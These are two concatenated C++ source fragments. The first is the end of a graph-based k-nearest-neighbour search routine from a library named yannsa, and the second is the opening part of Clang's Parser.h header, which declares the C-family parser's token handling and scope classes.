size_t start_index = 0;
while (start_index < search_K) {
auto& current_point = knn_results[start_index];
if (current_point.flag == false) {
start_index++;
continue;
}
current_point.flag = false;
const IdList& knn_list = all_point_index_[current_point.id];
for (size_t i = 0; i < knn_list.size(); i++) {
IntIndex neighbor_id = knn_list[i];
if (visited_point_flag[neighbor_id]) {
continue;
}
visited_point_flag[neighbor_id] = 1;
DistanceType neighbor_dist = distance_func_(GetPoint(neighbor_id), query);
size_t update_pos = knn_results.insert(PointDistancePairItem(neighbor_id, neighbor_dist, true));
if (update_pos <= start_index) {
start_index = update_pos;
}
}
}
}
template <typename PointType, typename DistanceFuncType, typename DistanceType>
void GraphIndex<PointType, DistanceFuncType, DistanceType>::SearchKnn(
const PointType& query, const util::GraphSearchParameter& search_param,
std::vector<std::string>& search_result) {
PointNeighbor knn_results(std::max(search_param.search_K, search_param.K));
SearchKnn(query, search_param.search_K, knn_results);
search_result.clear();
for (size_t i = 0; i < knn_results.effect_size(search_param.K); i++) {
search_result.push_back(this->dataset_ptr_->GetKeyById(knn_results[i].id));
}
}
} // namespace core
} // namespace yannsa
#endif
|
Parser.h | //===--- Parser.h - C Language Parser ---------------------------*- C++ -*-===//
//
// The LLVM Compiler Infrastructure
//
// This file is distributed under the University of Illinois Open Source
// License. See LICENSE.TXT for details.
//
//===----------------------------------------------------------------------===//
//
// This file defines the Parser interface.
//
//===----------------------------------------------------------------------===//
#ifndef LLVM_CLANG_PARSE_PARSER_H
#define LLVM_CLANG_PARSE_PARSER_H
#include "clang/AST/Availability.h"
#include "clang/Basic/OpenMPKinds.h"
#include "clang/Basic/OperatorPrecedence.h"
#include "clang/Basic/Specifiers.h"
#include "clang/Lex/CodeCompletionHandler.h"
#include "clang/Lex/Preprocessor.h"
#include "clang/Sema/DeclSpec.h"
#include "clang/Sema/LoopHint.h"
#include "clang/Sema/Sema.h"
#include "llvm/ADT/SmallVector.h"
#include "llvm/Support/Compiler.h"
#include "llvm/Support/PrettyStackTrace.h"
#include "llvm/Support/SaveAndRestore.h"
#include <memory>
#include <stack>
namespace clang {
class PragmaHandler;
class Scope;
class BalancedDelimiterTracker;
class CorrectionCandidateCallback;
class DeclGroupRef;
class DiagnosticBuilder;
class Parser;
class ParsingDeclRAIIObject;
class ParsingDeclSpec;
class ParsingDeclarator;
class ParsingFieldDeclarator;
class ColonProtectionRAIIObject;
class InMessageExpressionRAIIObject;
class PoisonSEHIdentifiersRAIIObject;
class VersionTuple;
class OMPClause;
class ObjCTypeParamList;
class ObjCTypeParameter;
/// Parser - This implements a parser for the C family of languages. After
/// parsing units of the grammar, productions are invoked to handle whatever has
/// been read.
///
class Parser : public CodeCompletionHandler {
friend class ColonProtectionRAIIObject;
friend class InMessageExpressionRAIIObject;
friend class PoisonSEHIdentifiersRAIIObject;
friend class ObjCDeclContextSwitch;
friend class ParenBraceBracketBalancer;
friend class BalancedDelimiterTracker;
Preprocessor &PP;
/// Tok - The current token we are peeking ahead. All parsing methods assume
/// that this is valid.
Token Tok;
// PrevTokLocation - The location of the token we previously
// consumed. This token is used for diagnostics where we expected to
// see a token following another token (e.g., the ';' at the end of
// a statement).
SourceLocation PrevTokLocation;
unsigned short ParenCount = 0, BracketCount = 0, BraceCount = 0;
unsigned short MisplacedModuleBeginCount = 0;
/// Actions - These are the callbacks we invoke as we parse various constructs
/// in the file.
Sema &Actions;
DiagnosticsEngine &Diags;
/// ScopeCache - Cache scopes to reduce malloc traffic.
enum { ScopeCacheSize = 16 };
unsigned NumCachedScopes;
Scope *ScopeCache[ScopeCacheSize];
/// Identifiers used for SEH handling in Borland. These are only
/// allowed in particular circumstances
// __except block
IdentifierInfo *Ident__exception_code,
*Ident___exception_code,
*Ident_GetExceptionCode;
// __except filter expression
IdentifierInfo *Ident__exception_info,
*Ident___exception_info,
*Ident_GetExceptionInfo;
// __finally
IdentifierInfo *Ident__abnormal_termination,
*Ident___abnormal_termination,
*Ident_AbnormalTermination;
/// Contextual keywords for Microsoft extensions.
IdentifierInfo *Ident__except;
mutable IdentifierInfo *Ident_sealed;
/// Ident_super - IdentifierInfo for "super", to support fast
/// comparison.
IdentifierInfo *Ident_super;
/// Ident_vector, Ident_bool - cached IdentifierInfos for "vector" and
/// "bool" fast comparison. Only present if AltiVec or ZVector are enabled.
IdentifierInfo *Ident_vector;
IdentifierInfo *Ident_bool;
/// Ident_pixel - cached IdentifierInfos for "pixel" fast comparison.
/// Only present if AltiVec enabled.
IdentifierInfo *Ident_pixel;
/// Objective-C contextual keywords.
mutable IdentifierInfo *Ident_instancetype;
/// \brief Identifier for "introduced".
IdentifierInfo *Ident_introduced;
/// \brief Identifier for "deprecated".
IdentifierInfo *Ident_deprecated;
/// \brief Identifier for "obsoleted".
IdentifierInfo *Ident_obsoleted;
/// \brief Identifier for "unavailable".
IdentifierInfo *Ident_unavailable;
/// \brief Identifier for "message".
IdentifierInfo *Ident_message;
/// \brief Identifier for "strict".
IdentifierInfo *Ident_strict;
/// \brief Identifier for "replacement".
IdentifierInfo *Ident_replacement;
/// C++0x contextual keywords.
mutable IdentifierInfo *Ident_final;
mutable IdentifierInfo *Ident_GNU_final;
mutable IdentifierInfo *Ident_override;
// C++ type trait keywords that can be reverted to identifiers and still be
// used as type traits.
llvm::SmallDenseMap<IdentifierInfo *, tok::TokenKind> RevertibleTypeTraits;
std::unique_ptr<PragmaHandler> AlignHandler;
std::unique_ptr<PragmaHandler> GCCVisibilityHandler;
std::unique_ptr<PragmaHandler> OptionsHandler;
std::unique_ptr<PragmaHandler> PackHandler;
std::unique_ptr<PragmaHandler> MSStructHandler;
std::unique_ptr<PragmaHandler> UnusedHandler;
std::unique_ptr<PragmaHandler> WeakHandler;
std::unique_ptr<PragmaHandler> RedefineExtnameHandler;
std::unique_ptr<PragmaHandler> FPContractHandler;
std::unique_ptr<PragmaHandler> OpenCLExtensionHandler;
std::unique_ptr<PragmaHandler> OpenMPHandler;
std::unique_ptr<PragmaHandler> MSCommentHandler;
std::unique_ptr<PragmaHandler> MSDetectMismatchHandler;
std::unique_ptr<PragmaHandler> MSPointersToMembers;
std::unique_ptr<PragmaHandler> MSVtorDisp;
std::unique_ptr<PragmaHandler> MSInitSeg;
std::unique_ptr<PragmaHandler> MSDataSeg;
std::unique_ptr<PragmaHandler> MSBSSSeg;
std::unique_ptr<PragmaHandler> MSConstSeg;
std::unique_ptr<PragmaHandler> MSCodeSeg;
std::unique_ptr<PragmaHandler> MSSection;
std::unique_ptr<PragmaHandler> MSRuntimeChecks;
std::unique_ptr<PragmaHandler> MSIntrinsic;
std::unique_ptr<PragmaHandler> CUDAForceHostDeviceHandler;
std::unique_ptr<PragmaHandler> OptimizeHandler;
std::unique_ptr<PragmaHandler> LoopHintHandler;
std::unique_ptr<PragmaHandler> UnrollHintHandler;
std::unique_ptr<PragmaHandler> NoUnrollHintHandler;
std::unique_ptr<CommentHandler> CommentSemaHandler;
/// Whether the '>' token acts as an operator or not. This will be
/// true except when we are parsing an expression within a C++
/// template argument list, where the '>' closes the template
/// argument list.
bool GreaterThanIsOperator;
/// ColonIsSacred - When this is false, we aggressively try to recover from
/// code like "foo : bar" as if it were a typo for "foo :: bar". This is not
/// safe in case statements and a few other things. This is managed by the
/// ColonProtectionRAIIObject RAII object.
bool ColonIsSacred;
/// \brief When true, we are directly inside an Objective-C message
/// send expression.
///
/// This is managed by the \c InMessageExpressionRAIIObject class, and
/// should not be set directly.
bool InMessageExpression;
/// The "depth" of the template parameters currently being parsed.
unsigned TemplateParameterDepth;
/// \brief RAII class that manages the template parameter depth.
class TemplateParameterDepthRAII {
unsigned &Depth;
unsigned AddedLevels;
public:
explicit TemplateParameterDepthRAII(unsigned &Depth)
: Depth(Depth), AddedLevels(0) {}
~TemplateParameterDepthRAII() {
Depth -= AddedLevels;
}
void operator++() {
++Depth;
++AddedLevels;
}
void addDepth(unsigned D) {
Depth += D;
AddedLevels += D;
}
unsigned getDepth() const { return Depth; }
};
/// Factory object for creating AttributeList objects.
AttributeFactory AttrFactory;
/// \brief Gathers and cleans up TemplateIdAnnotations when parsing of a
/// top-level declaration is finished.
SmallVector<TemplateIdAnnotation *, 16> TemplateIds;
/// \brief Identifiers which have been declared within a tentative parse.
SmallVector<IdentifierInfo *, 8> TentativelyDeclaredIdentifiers;
IdentifierInfo *getSEHExceptKeyword();
/// True if we are within an Objective-C container while parsing C-like decls.
///
/// This is necessary because Sema thinks we have left the container
/// to parse the C-like decls, meaning Actions.getObjCDeclContext() will
/// be NULL.
bool ParsingInObjCContainer;
bool SkipFunctionBodies;
/// The location of the expression statement that is being parsed right now.
/// Used to determine if an expression that is being parsed is a statement or
/// just a regular sub-expression.
SourceLocation ExprStatementTokLoc;
public:
Parser(Preprocessor &PP, Sema &Actions, bool SkipFunctionBodies);
~Parser() override;
const LangOptions &getLangOpts() const { return PP.getLangOpts(); }
const TargetInfo &getTargetInfo() const { return PP.getTargetInfo(); }
Preprocessor &getPreprocessor() const { return PP; }
Sema &getActions() const { return Actions; }
AttributeFactory &getAttrFactory() { return AttrFactory; }
const Token &getCurToken() const { return Tok; }
Scope *getCurScope() const { return Actions.getCurScope(); }
void incrementMSManglingNumber() const {
return Actions.incrementMSManglingNumber();
}
Decl *getObjCDeclContext() const { return Actions.getObjCDeclContext(); }
// Type forwarding. All of these are statically 'void*', but they may all be
// different actual classes based on the actions in place.
typedef OpaquePtr<DeclGroupRef> DeclGroupPtrTy;
typedef OpaquePtr<TemplateName> TemplateTy;
typedef SmallVector<TemplateParameterList *, 4> TemplateParameterLists;
typedef Sema::FullExprArg FullExprArg;
// Parsing methods.
/// Initialize - Warm up the parser.
///
void Initialize();
/// Parse the first top-level declaration in a translation unit.
bool ParseFirstTopLevelDecl(DeclGroupPtrTy &Result);
/// ParseTopLevelDecl - Parse one top-level declaration. Returns true if
/// the EOF was encountered.
bool ParseTopLevelDecl(DeclGroupPtrTy &Result);
bool ParseTopLevelDecl() {
DeclGroupPtrTy Result;
return ParseTopLevelDecl(Result);
}
/// ConsumeToken - Consume the current 'peek token' and lex the next one.
/// This does not work with special tokens: string literals, code completion
/// and balanced tokens must be handled using the specific consume methods.
/// Returns the location of the consumed token.
SourceLocation ConsumeToken() {
assert(!isTokenSpecial() &&
"Should consume special tokens with Consume*Token");
PrevTokLocation = Tok.getLocation();
PP.Lex(Tok);
return PrevTokLocation;
}
bool TryConsumeToken(tok::TokenKind Expected) {
if (Tok.isNot(Expected))
return false;
assert(!isTokenSpecial() &&
"Should consume special tokens with Consume*Token");
PrevTokLocation = Tok.getLocation();
PP.Lex(Tok);
return true;
}
bool TryConsumeToken(tok::TokenKind Expected, SourceLocation &Loc) {
if (!TryConsumeToken(Expected))
return false;
Loc = PrevTokLocation;
return true;
}
SourceLocation getEndOfPreviousToken() {
return PP.getLocForEndOfToken(PrevTokLocation);
}
/// Retrieve the underscored keyword (_Nonnull, _Nullable) that corresponds
/// to the given nullability kind.
IdentifierInfo *getNullabilityKeyword(NullabilityKind nullability) {
return Actions.getNullabilityKeyword(nullability);
}
private:
//===--------------------------------------------------------------------===//
// Low-Level token peeking and consumption methods.
//
/// isTokenParen - Return true if the cur token is '(' or ')'.
bool isTokenParen() const {
return Tok.getKind() == tok::l_paren || Tok.getKind() == tok::r_paren;
}
/// isTokenBracket - Return true if the cur token is '[' or ']'.
bool isTokenBracket() const {
return Tok.getKind() == tok::l_square || Tok.getKind() == tok::r_square;
}
/// isTokenBrace - Return true if the cur token is '{' or '}'.
bool isTokenBrace() const {
return Tok.getKind() == tok::l_brace || Tok.getKind() == tok::r_brace;
}
/// isTokenStringLiteral - True if this token is a string-literal.
bool isTokenStringLiteral() const {
return tok::isStringLiteral(Tok.getKind());
}
/// isTokenSpecial - True if this token requires special consumption methods.
bool isTokenSpecial() const {
return isTokenStringLiteral() || isTokenParen() || isTokenBracket() ||
isTokenBrace() || Tok.is(tok::code_completion);
}
/// \brief Returns true if the current token is '=' or is a type of '='.
/// For typos, give a fixit to '='
bool isTokenEqualOrEqualTypo();
/// \brief Return the current token to the token stream and make the given
/// token the current token.
void UnconsumeToken(Token &Consumed) {
Token Next = Tok;
PP.EnterToken(Consumed);
PP.Lex(Tok);
PP.EnterToken(Next);
}
/// ConsumeAnyToken - Dispatch to the right Consume* method based on the
/// current token type. This should only be used in cases where the type of
/// the token really isn't known, e.g. in error recovery.
SourceLocation ConsumeAnyToken(bool ConsumeCodeCompletionTok = false) {
if (isTokenParen())
return ConsumeParen();
if (isTokenBracket())
return ConsumeBracket();
if (isTokenBrace())
return ConsumeBrace();
if (isTokenStringLiteral())
return ConsumeStringToken();
if (Tok.is(tok::code_completion))
return ConsumeCodeCompletionTok ? ConsumeCodeCompletionToken()
: handleUnexpectedCodeCompletionToken();
return ConsumeToken();
}
/// ConsumeParen - This consume method keeps the paren count up-to-date.
///
SourceLocation ConsumeParen() {
assert(isTokenParen() && "wrong consume method");
if (Tok.getKind() == tok::l_paren)
++ParenCount;
else if (ParenCount)
--ParenCount; // Don't let unbalanced )'s drive the count negative.
PrevTokLocation = Tok.getLocation();
PP.Lex(Tok);
return PrevTokLocation;
}
/// ConsumeBracket - This consume method keeps the bracket count up-to-date.
///
SourceLocation ConsumeBracket() {
assert(isTokenBracket() && "wrong consume method");
if (Tok.getKind() == tok::l_square)
++BracketCount;
else if (BracketCount)
--BracketCount; // Don't let unbalanced ]'s drive the count negative.
PrevTokLocation = Tok.getLocation();
PP.Lex(Tok);
return PrevTokLocation;
}
/// ConsumeBrace - This consume method keeps the brace count up-to-date.
///
SourceLocation ConsumeBrace() {
assert(isTokenBrace() && "wrong consume method");
if (Tok.getKind() == tok::l_brace)
++BraceCount;
else if (BraceCount)
--BraceCount; // Don't let unbalanced }'s drive the count negative.
PrevTokLocation = Tok.getLocation();
PP.Lex(Tok);
return PrevTokLocation;
}
/// ConsumeStringToken - Consume the current 'peek token', lexing a new one
/// and returning the token kind. This method is specific to strings, as it
/// handles string literal concatenation, as per C99 5.1.1.2, translation
/// phase #6.
SourceLocation ConsumeStringToken() {
assert(isTokenStringLiteral() &&
"Should only consume string literals with this method");
PrevTokLocation = Tok.getLocation();
PP.Lex(Tok);
return PrevTokLocation;
}
/// \brief Consume the current code-completion token.
///
/// This routine can be called to consume the code-completion token and
/// continue processing in special cases where \c cutOffParsing() isn't
/// desired, such as token caching or completion with lookahead.
SourceLocation ConsumeCodeCompletionToken() {
assert(Tok.is(tok::code_completion));
PrevTokLocation = Tok.getLocation();
PP.Lex(Tok);
return PrevTokLocation;
}
///\ brief When we are consuming a code-completion token without having
/// matched specific position in the grammar, provide code-completion results
/// based on context.
///
/// \returns the source location of the code-completion token.
SourceLocation handleUnexpectedCodeCompletionToken();
/// \brief Abruptly cut off parsing; mainly used when we have reached the
/// code-completion point.
void cutOffParsing() {
if (PP.isCodeCompletionEnabled())
PP.setCodeCompletionReached();
// Cut off parsing by acting as if we reached the end-of-file.
Tok.setKind(tok::eof);
}
/// \brief Determine if we're at the end of the file or at a transition
/// between modules.
bool isEofOrEom() {
tok::TokenKind Kind = Tok.getKind();
return Kind == tok::eof || Kind == tok::annot_module_begin ||
Kind == tok::annot_module_end || Kind == tok::annot_module_include;
}
/// \brief Initialize all pragma handlers.
void initializePragmaHandlers();
/// \brief Destroy and reset all pragma handlers.
void resetPragmaHandlers();
/// \brief Handle the annotation token produced for #pragma unused(...)
void HandlePragmaUnused();
/// \brief Handle the annotation token produced for
/// #pragma GCC visibility...
void HandlePragmaVisibility();
/// \brief Handle the annotation token produced for
/// #pragma pack...
void HandlePragmaPack();
/// \brief Handle the annotation token produced for
/// #pragma ms_struct...
void HandlePragmaMSStruct();
/// \brief Handle the annotation token produced for
/// #pragma comment...
void HandlePragmaMSComment();
void HandlePragmaMSPointersToMembers();
void HandlePragmaMSVtorDisp();
void HandlePragmaMSPragma();
bool HandlePragmaMSSection(StringRef PragmaName,
SourceLocation PragmaLocation);
bool HandlePragmaMSSegment(StringRef PragmaName,
SourceLocation PragmaLocation);
bool HandlePragmaMSInitSeg(StringRef PragmaName,
SourceLocation PragmaLocation);
/// \brief Handle the annotation token produced for
/// #pragma align...
void HandlePragmaAlign();
/// \brief Handle the annotation token produced for
/// #pragma clang __debug dump...
void HandlePragmaDump();
/// \brief Handle the annotation token produced for
/// #pragma weak id...
void HandlePragmaWeak();
/// \brief Handle the annotation token produced for
/// #pragma weak id = id...
void HandlePragmaWeakAlias();
/// \brief Handle the annotation token produced for
/// #pragma redefine_extname...
void HandlePragmaRedefineExtname();
/// \brief Handle the annotation token produced for
/// #pragma STDC FP_CONTRACT...
void HandlePragmaFPContract();
/// \brief Handle the annotation token produced for
/// #pragma OPENCL EXTENSION...
void HandlePragmaOpenCLExtension();
/// \brief Handle the annotation token produced for
/// #pragma clang __debug captured
StmtResult HandlePragmaCaptured();
/// \brief Handle the annotation token produced for
/// #pragma clang loop and #pragma unroll.
bool HandlePragmaLoopHint(LoopHint &Hint);
/// GetLookAheadToken - This peeks ahead N tokens and returns that token
/// without consuming any tokens. LookAhead(0) returns 'Tok', LookAhead(1)
/// returns the token after Tok, etc.
///
/// Note that this differs from the Preprocessor's LookAhead method, because
/// the Parser always has one token lexed that the preprocessor doesn't.
///
const Token &GetLookAheadToken(unsigned N) {
if (N == 0 || Tok.is(tok::eof)) return Tok;
return PP.LookAhead(N-1);
}
public:
/// NextToken - This peeks ahead one token and returns it without
/// consuming it.
const Token &NextToken() {
return PP.LookAhead(0);
}
/// getTypeAnnotation - Read a parsed type out of an annotation token.
static ParsedType getTypeAnnotation(Token &Tok) {
return ParsedType::getFromOpaquePtr(Tok.getAnnotationValue());
}
private:
static void setTypeAnnotation(Token &Tok, ParsedType T) {
Tok.setAnnotationValue(T.getAsOpaquePtr());
}
/// \brief Read an already-translated primary expression out of an annotation
/// token.
static ExprResult getExprAnnotation(Token &Tok) {
return ExprResult::getFromOpaquePointer(Tok.getAnnotationValue());
}
/// \brief Set the primary expression corresponding to the given annotation
/// token.
static void setExprAnnotation(Token &Tok, ExprResult ER) {
Tok.setAnnotationValue(ER.getAsOpaquePointer());
}
public:
// If NeedType is true, then TryAnnotateTypeOrScopeToken will try harder to
// find a type name by attempting typo correction.
bool TryAnnotateTypeOrScopeToken(bool EnteringContext = false,
bool NeedType = false);
bool TryAnnotateTypeOrScopeTokenAfterScopeSpec(bool EnteringContext,
bool NeedType,
CXXScopeSpec &SS,
bool IsNewScope);
bool TryAnnotateCXXScopeToken(bool EnteringContext = false);
private:
enum AnnotatedNameKind {
/// Annotation has failed and emitted an error.
ANK_Error,
/// The identifier is a tentatively-declared name.
ANK_TentativeDecl,
/// The identifier is a template name. FIXME: Add an annotation for that.
ANK_TemplateName,
/// The identifier can't be resolved.
ANK_Unresolved,
/// Annotation was successful.
ANK_Success
};
AnnotatedNameKind
TryAnnotateName(bool IsAddressOfOperand,
std::unique_ptr<CorrectionCandidateCallback> CCC = nullptr);
/// Push a tok::annot_cxxscope token onto the token stream.
void AnnotateScopeToken(CXXScopeSpec &SS, bool IsNewAnnotation);
/// TryAltiVecToken - Check for context-sensitive AltiVec identifier tokens,
/// replacing them with the non-context-sensitive keywords. This returns
/// true if the token was replaced.
bool TryAltiVecToken(DeclSpec &DS, SourceLocation Loc,
const char *&PrevSpec, unsigned &DiagID,
bool &isInvalid) {
if (!getLangOpts().AltiVec && !getLangOpts().ZVector)
return false;
if (Tok.getIdentifierInfo() != Ident_vector &&
Tok.getIdentifierInfo() != Ident_bool &&
(!getLangOpts().AltiVec || Tok.getIdentifierInfo() != Ident_pixel))
return false;
return TryAltiVecTokenOutOfLine(DS, Loc, PrevSpec, DiagID, isInvalid);
}
/// TryAltiVecVectorToken - Check for context-sensitive AltiVec vector
/// identifier token, replacing it with the non-context-sensitive __vector.
/// This returns true if the token was replaced.
bool TryAltiVecVectorToken() {
if ((!getLangOpts().AltiVec && !getLangOpts().ZVector) ||
Tok.getIdentifierInfo() != Ident_vector) return false;
return TryAltiVecVectorTokenOutOfLine();
}
bool TryAltiVecVectorTokenOutOfLine();
bool TryAltiVecTokenOutOfLine(DeclSpec &DS, SourceLocation Loc,
const char *&PrevSpec, unsigned &DiagID,
bool &isInvalid);
/// Returns true if the current token is the identifier 'instancetype'.
///
/// Should only be used in Objective-C language modes.
bool isObjCInstancetype() {
assert(getLangOpts().ObjC1);
if (Tok.isAnnotation())
return false;
if (!Ident_instancetype)
Ident_instancetype = PP.getIdentifierInfo("instancetype");
return Tok.getIdentifierInfo() == Ident_instancetype;
}
/// TryKeywordIdentFallback - For compatibility with system headers using
/// keywords as identifiers, attempt to convert the current token to an
/// identifier and optionally disable the keyword for the remainder of the
/// translation unit. This returns false if the token was not replaced,
/// otherwise emits a diagnostic and returns true.
bool TryKeywordIdentFallback(bool DisableKeyword);
/// \brief Get the TemplateIdAnnotation from the token.
TemplateIdAnnotation *takeTemplateIdAnnotation(const Token &tok);
/// TentativeParsingAction - An object that is used as a kind of "tentative
/// parsing transaction". It gets instantiated to mark the token position and
/// after the token consumption is done, Commit() or Revert() is called to
/// either "commit the consumed tokens" or revert to the previously marked
/// token position. Example:
///
/// TentativeParsingAction TPA(*this);
/// ConsumeToken();
/// ....
/// TPA.Revert();
///
class TentativeParsingAction {
Parser &P;
Token PrevTok;
size_t PrevTentativelyDeclaredIdentifierCount;
unsigned short PrevParenCount, PrevBracketCount, PrevBraceCount;
bool isActive;
public:
explicit TentativeParsingAction(Parser& p) : P(p) {
PrevTok = P.Tok;
PrevTentativelyDeclaredIdentifierCount =
P.TentativelyDeclaredIdentifiers.size();
PrevParenCount = P.ParenCount;
PrevBracketCount = P.BracketCount;
PrevBraceCount = P.BraceCount;
P.PP.EnableBacktrackAtThisPos();
isActive = true;
}
void Commit() {
assert(isActive && "Parsing action was finished!");
P.TentativelyDeclaredIdentifiers.resize(
PrevTentativelyDeclaredIdentifierCount);
P.PP.CommitBacktrackedTokens();
isActive = false;
}
void Revert() {
assert(isActive && "Parsing action was finished!");
P.PP.Backtrack();
P.Tok = PrevTok;
P.TentativelyDeclaredIdentifiers.resize(
PrevTentativelyDeclaredIdentifierCount);
P.ParenCount = PrevParenCount;
P.BracketCount = PrevBracketCount;
P.BraceCount = PrevBraceCount;
isActive = false;
}
~TentativeParsingAction() {
assert(!isActive && "Forgot to call Commit or Revert!");
}
};
/// A TentativeParsingAction that automatically reverts in its destructor.
/// Useful for disambiguation parses that will always be reverted.
class RevertingTentativeParsingAction
: private Parser::TentativeParsingAction {
public:
RevertingTentativeParsingAction(Parser &P)
: Parser::TentativeParsingAction(P) {}
~RevertingTentativeParsingAction() { Revert(); }
};
class UnannotatedTentativeParsingAction;
/// ObjCDeclContextSwitch - An object used to switch context from
/// an objective-c decl context to its enclosing decl context and
/// back.
class ObjCDeclContextSwitch {
Parser &P;
Decl *DC;
SaveAndRestore<bool> WithinObjCContainer;
public:
explicit ObjCDeclContextSwitch(Parser &p)
: P(p), DC(p.getObjCDeclContext()),
WithinObjCContainer(P.ParsingInObjCContainer, DC != nullptr) {
if (DC)
P.Actions.ActOnObjCTemporaryExitContainerContext(cast<DeclContext>(DC));
}
~ObjCDeclContextSwitch() {
if (DC)
P.Actions.ActOnObjCReenterContainerContext(cast<DeclContext>(DC));
}
};
/// ExpectAndConsume - The parser expects that 'ExpectedTok' is next in the
/// input. If so, it is consumed and false is returned.
///
/// If a trivial punctuator misspelling is encountered, a FixIt error
/// diagnostic is issued and false is returned after recovery.
///
/// If the input is malformed, this emits the specified diagnostic and true is
/// returned.
bool ExpectAndConsume(tok::TokenKind ExpectedTok,
unsigned Diag = diag::err_expected,
StringRef DiagMsg = "");
/// \brief The parser expects a semicolon and, if present, will consume it.
///
/// If the next token is not a semicolon, this emits the specified diagnostic,
/// or, if there's just some closing-delimiter noise (e.g., ')' or ']') prior
/// to the semicolon, consumes that extra token.
bool ExpectAndConsumeSemi(unsigned DiagID);
/// \brief The kind of extra semi diagnostic to emit.
enum ExtraSemiKind {
OutsideFunction = 0,
InsideStruct = 1,
InstanceVariableList = 2,
AfterMemberFunctionDefinition = 3
};
/// \brief Consume any extra semi-colons until the end of the line.
void ConsumeExtraSemi(ExtraSemiKind Kind, unsigned TST = TST_unspecified);
public:
//===--------------------------------------------------------------------===//
// Scope manipulation
/// ParseScope - Introduces a new scope for parsing. The kind of
/// scope is determined by ScopeFlags. Objects of this type should
/// be created on the stack to coincide with the position where the
/// parser enters the new scope, and this object's constructor will
/// create that new scope. Similarly, once the object is destroyed
/// the parser will exit the scope.
class ParseScope {
Parser *Self;
ParseScope(const ParseScope &) = delete;
void operator=(const ParseScope &) = delete;
public:
// ParseScope - Construct a new object to manage a scope in the
// parser Self where the new Scope is created with the flags
// ScopeFlags, but only when we aren't about to enter a compound statement.
ParseScope(Parser *Self, unsigned ScopeFlags, bool EnteredScope = true,
bool BeforeCompoundStmt = false)
: Self(Self) {
if (EnteredScope && !BeforeCompoundStmt)
Self->EnterScope(ScopeFlags);
else {
if (BeforeCompoundStmt)
Self->incrementMSManglingNumber();
this->Self = nullptr;
}
}
// Exit - Exit the scope associated with this object now, rather
// than waiting until the object is destroyed.
void Exit() {
if (Self) {
Self->ExitScope();
Self = nullptr;
}
}
~ParseScope() {
Exit();
}
};
/// EnterScope - Start a new scope.
void EnterScope(unsigned ScopeFlags);
/// ExitScope - Pop a scope off the scope stack.
void ExitScope();
private:
/// \brief RAII object used to modify the scope flags for the current scope.
class ParseScopeFlags {
Scope *CurScope;
unsigned OldFlags;
ParseScopeFlags(const ParseScopeFlags &) = delete;
void operator=(const ParseScopeFlags &) = delete;
public:
ParseScopeFlags(Parser *Self, unsigned ScopeFlags, bool ManageFlags = true);
~ParseScopeFlags();
};
//===--------------------------------------------------------------------===//
// Diagnostic Emission and Error recovery.
public:
DiagnosticBuilder Diag(SourceLocation Loc, unsigned DiagID);
DiagnosticBuilder Diag(const Token &Tok, unsigned DiagID);
DiagnosticBuilder Diag(unsigned DiagID) {
return Diag(Tok, DiagID);
}
private:
void SuggestParentheses(SourceLocation Loc, unsigned DK,
SourceRange ParenRange);
void CheckNestedObjCContexts(SourceLocation AtLoc);
public:
/// \brief Control flags for SkipUntil functions.
enum SkipUntilFlags {
StopAtSemi = 1 << 0, ///< Stop skipping at semicolon
/// \brief Stop skipping at specified token, but don't skip the token itself
StopBeforeMatch = 1 << 1,
StopAtCodeCompletion = 1 << 2 ///< Stop at code completion
};
friend constexpr SkipUntilFlags operator|(SkipUntilFlags L,
SkipUntilFlags R) {
return static_cast<SkipUntilFlags>(static_cast<unsigned>(L) |
static_cast<unsigned>(R));
}
/// SkipUntil - Read tokens until we get to the specified token, then consume
/// it (unless StopBeforeMatch is specified). Because we cannot guarantee
/// that the token will ever occur, this skips to the next token, or to some
/// likely good stopping point. If Flags has StopAtSemi flag, skipping will
/// stop at a ';' character.
///
/// If SkipUntil finds the specified token, it returns true, otherwise it
/// returns false.
bool SkipUntil(tok::TokenKind T,
SkipUntilFlags Flags = static_cast<SkipUntilFlags>(0)) {
return SkipUntil(llvm::makeArrayRef(T), Flags);
}
bool SkipUntil(tok::TokenKind T1, tok::TokenKind T2,
SkipUntilFlags Flags = static_cast<SkipUntilFlags>(0)) {
tok::TokenKind TokArray[] = {T1, T2};
return SkipUntil(TokArray, Flags);
}
bool SkipUntil(tok::TokenKind T1, tok::TokenKind T2, tok::TokenKind T3,
SkipUntilFlags Flags = static_cast<SkipUntilFlags>(0)) {
tok::TokenKind TokArray[] = {T1, T2, T3};
return SkipUntil(TokArray, Flags);
}
bool SkipUntil(ArrayRef<tok::TokenKind> Toks,
SkipUntilFlags Flags = static_cast<SkipUntilFlags>(0));
/// SkipMalformedDecl - Read tokens until we get to some likely good stopping
/// point for skipping past a simple-declaration.
void SkipMalformedDecl();
private:
//===--------------------------------------------------------------------===//
// Lexing and parsing of C++ inline methods.
struct ParsingClass;
/// [class.mem]p1: "... the class is regarded as complete within
/// - function bodies
/// - default arguments
/// - exception-specifications (TODO: C++0x)
/// - and brace-or-equal-initializers for non-static data members
/// (including such things in nested classes)."
/// LateParsedDeclarations build the tree of those elements so they can
/// be parsed after parsing the top-level class.
class LateParsedDeclaration {
public:
virtual ~LateParsedDeclaration();
virtual void ParseLexedMethodDeclarations();
virtual void ParseLexedMemberInitializers();
virtual void ParseLexedMethodDefs();
virtual void ParseLexedAttributes();
};
/// Inner node of the LateParsedDeclaration tree that parses
/// all its members recursively.
class LateParsedClass : public LateParsedDeclaration {
public:
LateParsedClass(Parser *P, ParsingClass *C);
~LateParsedClass() override;
void ParseLexedMethodDeclarations() override;
void ParseLexedMemberInitializers() override;
void ParseLexedMethodDefs() override;
void ParseLexedAttributes() override;
private:
Parser *Self;
ParsingClass *Class;
};
/// Contains the lexed tokens of an attribute with arguments that
/// may reference member variables and so need to be parsed at the
/// end of the class declaration after parsing all other member
/// member declarations.
/// FIXME: Perhaps we should change the name of LateParsedDeclaration to
/// LateParsedTokens.
struct LateParsedAttribute : public LateParsedDeclaration {
Parser *Self;
CachedTokens Toks;
IdentifierInfo &AttrName;
SourceLocation AttrNameLoc;
SmallVector<Decl*, 2> Decls;
explicit LateParsedAttribute(Parser *P, IdentifierInfo &Name,
SourceLocation Loc)
: Self(P), AttrName(Name), AttrNameLoc(Loc) {}
void ParseLexedAttributes() override;
void addDecl(Decl *D) { Decls.push_back(D); }
};
// A list of late-parsed attributes. Used by ParseGNUAttributes.
class LateParsedAttrList: public SmallVector<LateParsedAttribute *, 2> {
public:
LateParsedAttrList(bool PSoon = false) : ParseSoon(PSoon) { }
bool parseSoon() { return ParseSoon; }
private:
bool ParseSoon; // Are we planning to parse these shortly after creation?
};
/// Contains the lexed tokens of a member function definition
